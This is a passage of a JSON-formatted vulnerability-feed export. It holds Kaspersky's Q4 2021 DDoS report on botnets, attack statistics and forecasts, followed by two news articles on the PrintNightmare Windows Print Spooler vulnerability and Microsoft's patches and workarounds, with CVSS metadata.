2\u20133 minutes and then stopped. Researchers note that the botnet is new, and they currently lack sufficient data to describe it. They also speculate that the short attack duration is because the attackers wish to remain undetected, so they do not borrow infected device users' communication channels for long.\n\nGoogle's Damian Menscher discovered a zombie network consisting of [vulnerable GitLab servers](<https://www.techtarget.com/searchsecurity/news/252509093/DDoS-botnet-exploiting-known-GitLab-vulnerability>). The botnet hijacked new devices by exploiting the [CVE-2021-22205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22205>) vulnerability, which GitLab patched in April 2021, and carried out DDoS attacks of over 1TB/s. Menscher does not specify whether the bot is entirely new or related to existing botnets. However, around the same time, Cloudflare [reported](<https://blog.cloudflare.com/cloudflare-blocks-an-almost-2-tbps-multi-vector-ddos-attack/>) a brief but powerful Mirai-type attack, involving, among other things, GitLab servers infected through CVE-2021-22205.\n\nKnown botnets made the news more than once in Q4. For instance, Moobot added a [relatively fresh vulnerability](<https://threatpost.com/moobot-botnet-hikvision-surveillance-systems/176879/>) to its arsenal. A bug designated as [CVE-2021-36260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260>) was found in some Hikvision camera models and patched in September 2021. Like CVE-2017-6079, this vulnerability allows attackers to execute arbitrary commands. Once on the device, Moobot waits for a command from the C2 server before launching a DDoS attack. Researchers link the campaign to a DDoS-as-a-Service provider whose Telegram channel they came across during their analysis. The channel was created in June and went live in August 2021.\n\nThe M\u0113ris botnet discovered [last quarter](<https://securelist.com/ddos-attacks-in-q3-2021/104796/>) turned out to be two botnets, reports Netscout. The company named the second one [Dvinis](<https://www.netscout.com/blog/asert/tale-two-botnets>) ("twin" in Latvian). Unlike its elder brother, it does not use HTTP pipelining, but is also deployed in high-power attacks. Moreover, according to Netscout, Dvinis accounts for 75% of all attacks attributed to M\u0113ris.\n\nIn late 2021, news broke of a [vulnerability in the Apache Log4j library](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), which laid claim to being the most dangerous vulnerability of the year. Log4Shell, as the vulnerability is called, is present in all versions of Log4j from 2.0-beta9 to 2.14.1, and allows an attacker to take full control over a vulnerable system. What's more, an exploit for the vulnerability is available online, and the library that contains it is used in millions of products, both commercial and open-source. Not surprisingly, [many cybercriminals](<https://www.securityweek.com/ransomware-trojans-ddos-malware-and-crypto-miners-delivered-log4shell-attacks>), including DDoS botnet developers, have added Log4Shell to their toolkit. In particular, [Mirai](<https://fidelissecurity.com/threatgeek/archive/observations-from-a-log4j-decoy-from-vulnerability-to-infection-to-ddos-in-record-time/>), [Muhstik](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) and Elknot bots are trying to exploit this vulnerability.\n\nAs for DDoS attacks themselves, media in the Philippines came under repeated fire during the past quarter. In mid-November, the online outfit [PinoyMedia Center](<https://newsinfo.inquirer.net/1518615/alternative-media-site-shuts-down-after-cyberattack>) was flooded; then in the first half of December the same fate befell the [news portal ABC-CBN News](<https://www.rappler.com/technology/abs-cbn-news-website-latest-victim-cyberattack/>), followed by the [media organization VERA Files](<https://verafiles.org/articles/vera-files-overcomes-cyberattack>); the digital media company Rappler was also [attacked several times](<https://www.rappler.com/technology/rappler-website-weathers-another-ddos-attack/>) a month by unknown actors. Also in Q4, the [Indonesian journalism initiative Project Multatuli](<https://www.thejakartapost.com/life/2021/10/07/project-multatuli-digitally-attacked-after-reporting-on-police-inaction-in-rape-case.html>) got DDoSed after publishing an article criticizing the work of local law enforcement agencies.\n\nCybercriminals also targeted tech companies this quarter. The Polish arm of T-Mobile reported the [largest ever attack on this sector in the country](<https://www.reuters.com/business/media-telecom/polish-t-mobile-unit-faces-cyber-attack-systems-not-compromised-2021-12-03/>), which, however, was repelled. Another DDoS target was the blockchain platform [Solana](<https://cointelegraph.com/news/solana-reportedly-hit-by-ddos-attack-but-network-remains-online>). Blockasset, an NFT marketplace powered by Solana, was the first to draw attention to the attack. The company noted that the DDoS had caused a slowdown in token distribution. GenesysGo, a Solana-based infrastructure provider, also noted some services were working intermittently, but assured there was no major cause for concern.\n\nThe DDoS attacks on VoIP providers continued. In early October, [British company VoIP Unlimited](<https://www.ispreview.co.uk/index.php/2021/10/ddos-attack-hits-voip-and-internet-provider-voip-unlimited-again.html>) fell victim again, having been attacked by DDoS extortionists last quarter. The new wave of junk traffic was accompanied by a ransom demand. Similar attacks affected [various other British providers](<https://www.bbc.com/news/technology-59053876>). And in November, clients of VoIP provider [Telnyx](<https://www.bleepingcomputer.com/news/security/telnyx-is-the-latest-voip-provider-hit-with-ddos-attacks/>) worldwide were hit by outages. The perpetrators could be the REvil group, which is linked to past attacks on VoIP providers and was [liquidated](<https://www.bbc.com/news/technology-59998925>) by Russian law enforcement agencies in January, after the US authorities had supplied information about the attackers.\n\nIn Q4, besides VoIP providers, [e-mail service providers](<https://therecord.media/ddos-attacks-hit-multiple-email-providers/>) were targeted by ransom DDoS (RDoS) campaigns. Those affected were mostly small companies that provide secure and private e-mail accounts by subscription or invitation: Runbox, Posteo, Fastmail, TheXYZ, Guerrilla Mail, Mailfence, Kolab Now and RiseUp. The attackers called themselves Cursed Patriarch and demanded a ransom of 0.06BTC from victims (around US$4,000 at the time of the attack).\n\nRansomwarers continued to use DDoS as additional leverage. For instance, right from the start the new Yanluowang ransomware [threatens to DDoS victims](<https://www.bleepingcomputer.com/news/security/new-yanluowang-ransomware-used-in-targeted-enterprise-attacks/>) if "they take the attackers for fools." Besides Yanluowang, the [HelloKitty ransomware](<https://securityintelligence.com/news/hellokitty-ransomware-group-ddos-extortion/>) group, known for [attacking](<https://www.kaspersky.com/blog/cd-projekt-ransomware-attack/38701/>) CD Projekt, the developer of _The Witcher_ and _Cyberpunk 2077_, added DDoS to its arsenal.\n\nSpeaking of games: attackers in Q4 did not leave gamers alone. In October, _Apex Legends_ players [set a record](<https://www.invenglobal.com/articles/15279/apex-players-win-longest-match-in-history-due-to-ddos-attack>) for the longest match ever, because the server was DDoSed throughout. And attacks on Blizzard in [November](<https://www.techtimes.com/articles/268483/20211124/activision-blizzard-s-battle-net-down-battle-net-ddos-attack-call-of-duty-warzone-minor-outage-overwatch-minor-outage.htm>) and [December](<https://www.digitaltrends.com/gaming/blizzard-hit-with-another-ddos/>) led to problems with accessing certain games, in particular _Overwatch_ and _World of Warcraft_. Players themselves also got it in the neck. Among those who [suffered](<https://dotesports.com/streaming/news/twitch-streamers-sodapoppin-xqc-nick-polom-get-ddosd-after-ip-leak>) were several popular streamers, likely due to an IP leak from the new title _Crab Game_: the streamers experienced issues after playing the game. Meanwhile, some _Dead by Daylight_ streamers were not only DDoSed, but [doxxed](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and swatted (the act of making a false report to the police with the intention of having a real-life SWAT team sent to the target's home). One of the victims tweeted that, during such a fake call, one of the police officers recognized him because he himself plays _Dead by Daylight_. How exactly the attackers got hold of the streamers' IP addresses and other data is unknown.\n\nhttps://twitter.com/Elix_9/status/1458330303437574149\n\nFans of _Titanfall 2_, fed up with DDoS attacks, took the initiative in Q4 and [created a mod](<https://www.pcgamer.com/titanfall-2-gets-fan-made-custom-servers-on-pc/>) for playing on custom servers if the official ones are down. Tracking the IP of a private server to flood it with junk traffic is not child's play, so this measure greatly reduces the likelihood of DDoS.\n\nSuccesses in the fight against botnets were reflected in Q4 news. In October, for instance, Ukrainian police [arrested](<https://therecord.media/ukraine-arrests-operator-of-ddos-botnet-with-100000-bots/>) the operator of a DDoS botnet consisting of 100,000 infected devices. And in December, Google [filed a lawsuit](<https://threatpost.com/google-glupteba-botnet-lawsuit/176826/>) against the operators of another botnet, Glupteba. The Internet giant also took steps to eliminate the botnet itself by blocking 63 million malicious documents, 908 cloud projects, more than a thousand Google accounts and a further 870 Google Ads accounts. Google also worked with other companies to shut down the botnet's C2 servers. Glupteba consists of a million infected IoT devices and Windows computers. The botnet can also install proxy servers on infected devices, mine cryptocurrency and conduct DDoS attacks. In addition, Glupteba uses the Bitcoin blockchain to store the addresses of backup C2 servers, making it harder to defeat. According to Kaspersky, it was this botnet that facilitated the spread of the notorious M\u0113ris last quarter.\n\nOne last thing, attackers regularly carry out DDoS attacks on each other. In November, unknown actors [tried to take down](<https://www.bleepingcomputer.com/news/security/dark-web-market-cannazon-shuts-down-after-massive-ddos-attack/>) the dark-web marketplace Cannazon, which, as the name suggests, specializes in the sale of cannabis. The resource was shut down shortly afterwards, but its administrators [claim](<https://www.techradar.com/news/dark-web-marketplace-bites-the-dust-after-colossal-ddos-attack>) they had long planned to close it anyway, and the DDoS was a convenient pretext to act sooner rather than later.\n\n## Quarter and year trends\n\nQ4 played out in line with our forecasts: we saw impressive growth in the number of DDoS attacks, setting a new record in the history of our observations. Let's look at the figures:\n\n_Comparative number of DDoS attacks, Q3 and Q4 2021, and Q4 2020. Q4 2020 data is taken as 100% ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154544/01-en-ddos-report-q4.png>))_\n\nThe number of attacks in Q4 increased by 52% against the previous quarter and more than 4.5 times against the same period last year. The numbers look scary, but instead of rushing to conclusions, better to figure out why they are so.\n\nLet's start with the increase in the number of DDoS attacks relative to Q3. Such growth in the last three months of the year is a traditional seasonal fluctuation that we predict (and that occurs) pretty much every year. Towards the end of the year, life steps up a gear, and this cannot fail to affect the DDoS market: competition in retail hots up, students sit exams, various activists become more lively: all this leads to an increase in the number of attacks.\n\nIn addition, the size of the DDoS market is inversely proportional to that of the cryptocurrency market, which we've written about several times. This is because DDoS and mining capacities are partially interchangeable, so botnet owners tend to deploy them in mining when cryptocurrency prices are high and in DDoS when they fall. We witnessed precisely that in Q4, and not for the first time: a rise in the number of DDoS attacks amid a sharp drop in the value of cryptocurrencies.\n\nBoth of these factors \u2014 seasonal fluctuations and falling cryptocurrency prices \u2014 buoyed the DDoS attack market throughout Q4, hence the 1.5-fold increase. This becomes even clearer when viewing the stats by month: October accounted for 16% of all DDoS attacks in Q4, November 46% and December 38%.\n\n_Percentage distribution of DDoS attacks by month, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154631/02-en-ddos-report-q4.png>))_\n\nNow let's see where the frightening 4.5-fold increase relative to the previous year came from. In contrast to 2021's all-time high Q4, 2020 posted a record low. In Q4 2020, we observed the opposite situation: a declining DDoS market against the backdrop of rampant cryptocurrency prices. In fact, the DDoS market spent just about the whole of 2021 recovering from this collapse, hence such impressive growth: in essence, 2021's all-time high divided by 2020's all-time low.\n\nThe diagram below clearly shows the increase in the number of DDoS attacks over the year, as well as peaks attributable to the cryptocurrency collapse in the summer of 2021 and at the end of the year.\n\n_Dynamics of DDoS attacks, October 2020\u2013December 2021; October 2020 data is taken as 100% ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154708/12-en-ddos-report-q4.png>))_\n\nAs for DDoS targets, the cross-industry distribution of attacks was fairly even \u2014 we cannot say that DDoS activity was higher in any particular sector. Perhaps the only thing of note was the spike in attacks on educational resources in November (largely in the Moscow region) and December (largely in the Republic of Tatarstan). We cannot pinpoint the reason for this, but most likely the attacks were related to regional specifics in the field of education, for example, the exam or vacation schedule.\n\n## DDoS attack statistics\n\n### Methodology\n\nKaspersky has a long history of combating cyberthreats, including DDoS attacks of any type and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.\n\nA part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C2 servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.\n\nThis report contains DDoS Intelligence statistics for Q4 2021.\n\nIn the context of this report, the incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. If the same resource is attacked by the same botnet after an interval of 24 hours or more, two attacks will be counted. Bot requests originating from different botnets but directed at one resource also count as separate attacks.\n\nThe geographic locations of DDoS attack victims and C2 servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.\n\nDDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.\n\n### Quarter summary\n\n * Most of all, attackers in Q4 took aim at US-based resources: the country accounts for 43.55% of attacks and 44.54% of unique targets.\n * Our DDoS Intelligence system recorded 86,710 DDoS attacks.\n * The quarter's quietest days fell on Chinese Singles' Day and Black Friday, two mega shopping events.\n * 94,29% of attacks lasted less than 4 hours.\n * Half of the DDoS attacks were carried out by means of UDP flooding.\n * 46,49% of the botnet C2 servers were located in the US.\n * 70,96% of attacks on Kaspersky SSH honeypots were carried out by bots in Russia.\n\n### DDoS attacks geography\n\nIn Q4, as in previous quarters in 2021, the bulk of DDoS attacks targeted US-based resources (43.55%). And the country's share in the geographic distribution rose once more. China (9.96%) returned to second place, up 2.22 p.p. on the previous reporting period, while the Hong Kong SAR (8.80%) took bronze: its share fell by a factor of more than 1.5 against the previous quarter.\n\n_Distribution of DDoS attacks by country and territory, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154746/03-en-ddos-report-q4.png>))_\n\nThe share of attacks increased in Germany (4.85%) and France (3.75%), which moved up to fourth and fifth positions, respectively. Canada (3.64%) remained in sixth place, the UK (3.21%) climbed to seventh, while eighth spot in Q4 went to the Netherlands (2.75%), where things had been relatively calm in the previous reporting period. Rounding out the TOP 10 countries and territories by number of attacks at the end of 2021 are Singapore (2.68%) and Brazil (2.08%), whose share more than halved from the previous quarter.\n\nAs usual, the geography of unique targets mirrored the distribution of individual attacks. The most targets were located in the US (44.54%), whose share increased compared to the previous quarter. The second and third lines are taken by the Hong Kong SAR (9.07%) and China (8.12%), respectively.\n\n_Distribution of unique targets by country and territory, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154823/04-en-ddos-report-q4.png>))_\n\nIn fourth place by number of targets is Germany (4.67%), followed in fifth by the UK (3.58%). Next come France (3.28%) and Canada (2.98%). The share of these four countries increased slightly in Q4, and they moved up one rank from Q3. Eighth by number of unique targets was the Netherlands (2.76%), whose share almost doubled, and rounding out the TOP 10, as in the ranking by number of attacks, were Singapore (2.49%) and Brazil (2.37%), whose share almost halved.\n\n### Dynamics of the number of DDoS attacks\n\nDuring Q4, our DDoS Intelligence system recorded 86,710 DDoS attacks on resources worldwide. In contrast to the previous reporting period, which saw several unusually stormy days, the attacks were distributed relatively evenly throughout the quarter: from 500 to 1,500 per day. However, we did see a surge in DDoS activity on October 11, with 2,606 attacks in 24 hours. November, meanwhile, was marked by two notable drops in DDoS activity: on November 9\u201311 and 23\u201330, the number of attacks fell below 500 per day. Curiously, the first drop came on Chinese Singles' Day and the second on Black Friday. Both dates are associated with massive online sales, which tend to cause a spike in various kinds of web attacks.\n\n_Dynamics of the number of DDoS attacks, Q4 2021 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2022/02/09160339/05-en-ru-es-ddos-report-q4.png>))_\n\nAs we noted above, Q4 lacked the dramatic bursts of DDoS activity seen in its predecessor. This was reflected also in the distribution of attacks by day of the week: the spread between the most and least active days was 5.02%, down 2.72 p.p. on Q3. We observed the most DDoS attacks on Sundays (16.61%) \u2014 this day's share in the distribution of attacks climbed by 0.66 p.p.; Thursday (11.59%) remained the quietest day, despite its share increasing slightly. The shares of Monday (15.78%), Tuesday (14.17%) and Friday (14.58%) also increased, while those of Wednesday (12.67%) and Saturday (14.60%) decreased, with Wednesday in Q4 being the second calmest day after Thursday.\n\n_Distribution of DDoS attacks by day of the week, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154916/06-en-ddos-report-q4.png>))_\n\n### Duration and types of DDoS attacks\n\nIn Q4, we observed an increase in the share of very short (less than 4 hours) DDoS attacks, which accounted for 94.29% of the total, plus a significant drop in the number of long ones: only 0.02% of attacks lasted more than 100 hours. What's more, the longest attack in the quarter was one-third shorter than the longest in the previous reporting period \u2014 218 hours, or just over nine days. Consequently, the average DDoS attack duration fell once more, this time to just under two hours.\n\n_Distribution of DDoS attacks by duration, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154944/07-en-ddos-report-q4.png>))_\n\nIn terms of attack types, in Q4 we again saw a redistribution of forces. UDP flooding came out on top again, with more than half of all attacks deploying this method. The share of TCP flooding (30.75%) also increased markedly, while that of SYN flooding (16.29%) decreased more than three times. HTTP (1.33%) and GRE flooding (1.32%) stayed put, although their shares increased slightly.\n\n_Distribution of DDoS attacks by type, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155033/08-en-ddos-report-q4.png>))_\n\n### Geographic distribution of botnets\n\nThe most botnet C2 servers active in Q4 were located in the US (46.49%), whose share increased by 3.05 p.p. against the previous reporting period. The Netherlands (10.17%) and Germany (7.02%) swapped places. A further 6.78% of C2 servers were located in the Czech Republic, whose share grew almost by 3 p.p., while Canada and the UK each had a 3.15% slice. France hosted 2.91% of the active botnet infrastructure, while 2.66% of C2 servers operated out of Russia. Also in the TOP 10 countries by location of botnets were Vietnam (1.94%) and Romania (1.45%).\n\n_Distribution of botnet C2 servers by country, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155106/09-en-ddos-report-q4.png>))_\n\n### Attacks on IoT honeypots\n\nAs for bots attempting to expand botnets in Q4, the largest share of devices that attacked Kaspersky SSH honeypots were located in China (26.73%), the US (11.20%) and Germany (9.05%). At the same time, the share of the first two countries decreased, while the latter added 3.47 p.p. against Q3. Another 5.34% of active bots were located in Vietnam, and 5.13% in Brazil. That said, the vast majority of attacks on our honeypots (70.96%) originated in Russia, where only 2.75% of attacking devices were located; while Vietnam accounted for just 7.94% of attacks, and the US 4.84%. This most likely means that at least one Russian bot showed a high level of performance.\n\n_Geographic distribution of devices from which attempts were made to attack Kaspersky SSH honeypots, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155150/10-en-ddos-report-q4.png>))_\n\nMost of the devices that attacked our Telnet traps, as in the previous quarter, were situated in China (44.88%), India (12.82%) and Russia (5.05%). The first country's share increased by 3.76 p.p., while the latter two saw a drop of 2.4 and 0.93 p.p., respectively. The lion's share of attacks on Kaspersky honeypots came from China (65.27%).\n\n_Geographic distribution of devices from which attempts were made to attack Kaspersky Telnet honeypots, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155228/11-en-ddos-report-q4.png>))_\n\n## Conclusion\n\nOn the one hand, Q4 met our expectations for this period; on the other, it surprised us. For example, instead of the expected increase in DDoS activity during major online sales, we saw a botnet lull. A feature of the quarter was the large number of very short DDoS attacks, as well as a slew of media reports about short but powerful attacks.\n\nNow for our forecasts. Going by previous years' trends, we expect Q1 2022 to produce roughly the same indicators as Q4 2021. But the situation in the world and, in particular, the cryptocurrency market is too volatile to make such a confident prediction. The bitcoin price has fallen to half its peak value, but remains high. It suffered a similar collapse in the middle of last year, but after that grew even stronger. If cryptocurrencies shoot up again, we could see a significant drop in the DDoS attack market, but if they sink even further, we will probably see an increase. It is impossible to predict which way it will go. But despite the lack of concrete information, we see no preconditions for any major fluctuations, and expect figures similar to those in Q4.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-10T10:00:04", "type": "securelist", "title": "DDoS attacks in Q4 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6079", "CVE-2021-22205", "CVE-2021-36260", "CVE-2021-44228"], "modified": "2022-02-10T10:00:04", "id": "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "href": "https://securelist.com/ddos-attacks-in-q4-2021/105784/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s0/windows-patch-update.jpg>)\n\nMicrosoft has shipped an [emergency out-of-band security update](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#1646>) to address a critical zero-day vulnerability \u2014 known as \"PrintNightmare\" \u2014 that affects the Windows Print Spooler service and can permit remote threat actors to run arbitrary code and take over vulnerable systems.\n\nTracked as [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8), the remote code execution flaw impacts all supported editions of Windows. Last week, the company warned it had detected active exploitation attempts targeting the vulnerability.\n\n\"The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system,\" the CERT Coordination Center said of the issue.\n\nIt's worth noting that PrintNightmare includes both remote code execution and a [local privilege escalation](<https://github.com/calebstewart/CVE-2021-1675>) vector that can be abused in attacks to run commands with SYSTEM privileges on targeted Windows machines.\n\n[](<https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg>)\n\n\"The Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" CERT/CC vulnerability analyst Will Dormann [said](<https://www.kb.cert.org/vuls/id/383432>).\n\nThis effectively means that the incomplete fix could still be used by a local adversary to gain SYSTEM privileges. As workarounds, Microsoft recommends stopping and disabling the Print Spooler service or turning off inbound remote printing through Group Policy to block remote attacks.\n\nGiven the criticality of the flaw, the Windows maker has issued patches for:\n\n * Windows Server 2019\n * Windows Server 2012 R2\n * Windows Server 2008\n * Windows 8.1\n * Windows RT 8.1, and\n * Windows 10 (versions 21H1, 20H2, 2004, 1909, 1809, 1803, and 1507)\n\nMicrosoft has even taken the unusual step of issuing the fix for Windows 7, which officially reached the end of support as of January 2020.\n\nThe [update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), however, does not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016, for which the Redmond-based company stated patches will be released in the forthcoming days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T03:11:00", "type": "thn", "title": "Microsoft Issues Emergency Patch for Critical Windows PrintNightmare Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T03:38:13", "id": "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "href": "https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg>)\n\nEven as Microsoft [expanded patches](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center>) for the so-called [PrintNightmare vulnerability](<https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html>) for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the fix for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to run arbitrary code on infected systems.\n\nOn Tuesday, the Windows maker issued an [emergency out-of-band update](<https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html>) to address [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8) after the flaw was accidentally disclosed by researchers from Hong Kong-based cybersecurity firm Sangfor late last month, at which point it emerged that the issue was different from another bug \u2014 tracked as [CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \u2014 that was patched by Microsoft on June 8.\n\n\"Several days ago, two security vulnerabilities were found in Microsoft Windows' existing printing mechanism,\" Yaniv Balmas, head of cyber research at Check Point, told The Hacker News. \"These vulnerabilities enable a malicious attacker to gain full control on all windows environments that enable printing.\"\n\n\"These are mostly working stations but, at times, this relates to entire servers that are an integral part of very popular organizational networks. Microsoft classified these vulnerabilities as critical, but when they were published they were able to fix only one of them, leaving the door open for explorations of the second vulnerability,\" Balmas added.\n\nPrintNightmare stems from bugs in the Windows [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) service, which manages the printing process inside local networks. The main concern with the threat is that non-administrator users had the ability to load their own printer drivers. This has now been rectified.\n\n\"After installing this [update] and later Windows updates, users who are not administrators can only install signed print drivers to a print server,\" Microsoft [said](<https://support.microsoft.com/en-us/topic/july-7-2021-kb5004948-os-build-14393-4470-out-of-band-fb676642-a3fe-4304-a79c-9d651d2f6550>), detailing the improvements made to mitigate the risks associated with the flaw. \"Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\"\n\nPost the update's release, CERT/CC vulnerability analyst Will Dormann cautioned that the patch \"only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" thereby allowing attackers to abuse the latter to gain SYSTEM privileges on vulnerable systems.\n\nNow, further testing of the update has revealed that exploits targeting the flaw could [bypass](<https://twitter.com/gentilkiwi/status/1412771368534528001>) the [remediations](<https://twitter.com/wdormann/status/1412813044279910416>) entirely to gain both local privilege escalation and remote code execution. To achieve this, however, a [Windows policy](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer>) called '[Point and Print Restrictions](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/group-policy/point-print-restrictions-policies-ignored>)' must be enabled (Computer Configuration\\Policies\\Administrative Templates\\Printers: Point and Print Restrictions), using which malicious printer drivers could be potentially installed.\n\n\"Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the Point and Print NoWarningNoElevationOnInstall is set to 1,\" Dormann [said](<https://www.kb.cert.org/vuls/id/383432>) Wednesday. Microsoft, for its part, [explains in its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) that \"Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible.\"\n\nWhile Microsoft has recommended the nuclear option of stopping and disabling the Print Spooler service, an [alternative workaround](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) is to enable security prompts for Point and Print, and limit printer driver installation privileges to administrators alone by configuring the \"RestrictDriverInstallationToAdministrators\" registry value to prevent regular users from installing printer drivers on a print server.\n\n**UPDATE:** In response to CERT/CC's report, Microsoft [said](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) on Thursday:\n\n\"Our investigation has shown that the OOB [out-of-band] security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", 